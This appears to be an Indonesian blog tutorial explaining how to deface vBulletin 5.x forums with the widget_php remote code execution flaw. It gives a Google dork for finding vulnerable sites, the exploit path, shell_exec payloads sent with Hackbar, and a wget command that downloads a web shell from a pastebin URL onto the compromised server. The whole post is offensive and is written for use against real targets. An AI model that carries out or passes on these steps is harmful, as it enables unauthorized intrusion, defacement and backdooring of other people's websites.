Beranda  ›  Dork  ›  Hacking  ›  tutorial

Cara Deface + Bypass Exec vBulletin RCE v5.x.x

Kamis, 03 Oktober 2019 Tulis Komentar
Nelo.F4 - Remote Code Execution di vBulletin lagi booming ya minggu minggu ini wkwkw. yaudah langsung aja ke tkp oke

Bahan:

  1. Firefox v5 kebawah atau bisa juga pake cyberfox
  2. Hackbar
  3. Dork:"Powered by vBulletin™ Version 5.0.4"
  4. Brain!
Exploit: /ajax/render/widget_php
Payload 1: widgetConfig[code]=echo shell_exec=('id');
Payload 2: echo shell_exec=('id');

pertama kalian cari target dolo pake dork diatas atau bisa juga di kembangin.

disini gw asumsikan kalian udah dapet target oke?
taro exploit di www,site,com/forum/exploit disini
atau
www,site,com/exploit disini

Kalo vuln biasanya kaya screen shot dibawah ini.

nah kalo udah kaya gitu, kalian centang post dan taro payloadnya di kolom post itu terus klik execute. masih belom ngerti? cek ss dibawah.

nah kalo udah kaya gambar diatas kalian tinggal wget
code: echo shell_exec('wget -O ppq.php https://pastebin.com/raw/4VcQuc55');
klik Execute terus cek www.site.com/forum/shellmu.php 

Goodluck!

Belum ada Komentar untuk "Cara Deface + Bypass Exec vBulletin RCE v5.x.x"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel